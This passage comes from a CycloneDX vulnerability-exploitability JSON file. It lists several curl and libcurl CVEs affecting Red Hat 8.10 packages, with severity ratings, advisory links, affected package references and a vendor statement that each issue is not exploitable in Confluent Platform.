          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-14524",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        601
      ],
      "description": "When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer\nperforms a cross-protocol redirect to a second URL that uses an IMAP, LDAP,\nPOP3 or SMTP scheme, curl might wrongly pass on the bearer token to the new\ntarget host.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-14524"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/07/4"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-14524"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-14524.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-14524.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-g897-jvjx-78vg"
        },
        {
          "url": "https://hackerone.com/reports/3459417"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14524"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-14524"
        }
      ],
      "published": "2026-01-08T10:15:46+00:00",
      "updated": "2026-06-17T08:36:04+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-15079",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        297
      ],
      "description": "When doing SSH-based transfers using either SCP or SFTP, and setting the\nknown_hosts file, libcurl could still mistakenly accept connecting to hosts\n*not present* in the specified file if they were added as recognized in the\nlibssh *global* known_hosts file.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-15079"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/07/6"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-15079"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-15079.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-15079.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-7q9p-cx8r-rh2q"
        },
        {
          "url": "https://hackerone.com/reports/3477116"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15079"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-15079"
        }
      ],
      "published": "2026-01-08T10:15:47+00:00",
      "updated": "2026-06-17T08:37:03+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-15224",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        287
      ],
      "description": "When doing SSH-based transfers using either SCP or SFTP, and asked to do\npublic key authentication, curl would wrongly still ask and authenticate using\na locally running SSH agent.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-15224"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/07/7"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-15224"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-15224.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-15224.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-hccr-q52r-4w88"
        },
        {
          "url": "https://hackerone.com/reports/3480925"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15224"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-15224"
        }
      ],
      "published": "2026-01-08T10:15:47+00:00",
      "updated": "2026-06-17T08:37:24+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
